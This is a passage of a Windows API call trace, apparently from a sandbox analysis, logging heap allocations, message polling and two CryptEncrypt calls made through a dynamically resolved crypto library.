[0257.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0257.983] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.983] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c38 | out: hHeap=0x970000) returned 1 [0257.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0257.983] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0257.983] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0257.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51730, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0257.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0257.984] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0257.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0257.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0257.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54558 [0257.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0257.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0257.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0257.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0257.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0257.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0257.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0257.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0257.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0257.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0257.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0257.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0257.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0257.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0257.985] CryptEncrypt (in: hKey=0xa87410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1f8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x200) returned 1 [0257.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf0050 [0257.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0257.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0257.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0257.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0257.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0257.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0257.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0257.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0257.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0257.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0257.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0257.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0257.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0257.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0257.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0257.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0257.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0257.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0257.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0257.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0257.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0257.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0257.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0257.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0257.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0257.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0257.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0257.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0257.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0257.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0257.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0257.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0257.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0257.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0257.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0257.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0257.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0257.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0257.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0257.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0257.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0257.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0257.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0257.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0257.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0257.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0257.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0257.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0257.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0257.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0257.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0257.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0257.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0257.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0257.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0257.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0257.989] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0257.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0257.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0257.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0257.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0257.990] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.990] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0257.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0257.990] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0257.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0257.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0257.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0257.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0257.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0257.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0257.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0257.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0257.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0257.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0257.991] CharLowerBuffW (in: lpsz="byte[512]", cchLength=0x9 | out: lpsz="byte[512]") returned 0x9 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0257.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0257.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0257.992] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0257.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0257.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0257.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e68 [0257.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0257.992] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.992] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0257.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0257.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0257.992] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0257.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0257.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0257.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0257.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0257.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e515c8 [0257.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e515c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0257.993] CryptEncrypt (in: hKey=0xa87410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bf0050*, pdwDataLen=0x8cef60*=0x1f8, dwBufLen=0x200 | out: pbData=0x3bf0050*, pdwDataLen=0x8cef60*=0x200) returned 1 [0257.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf0490 [0257.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0257.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0257.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0257.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0257.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0257.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0257.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0257.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0257.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0257.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0257.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0257.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0257.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0257.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0257.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0257.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0257.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0257.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0257.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0257.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0257.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0257.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0257.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0257.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0257.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0257.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0257.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0257.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0257.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0257.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0257.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0257.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0257.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0257.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0257.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0257.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0257.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0257.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0257.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0257.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0257.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0257.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0257.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0257.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0257.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0257.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0257.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0257.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0257.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0257.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0257.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0257.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0257.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0257.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0257.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0257.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0257.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0257.996] 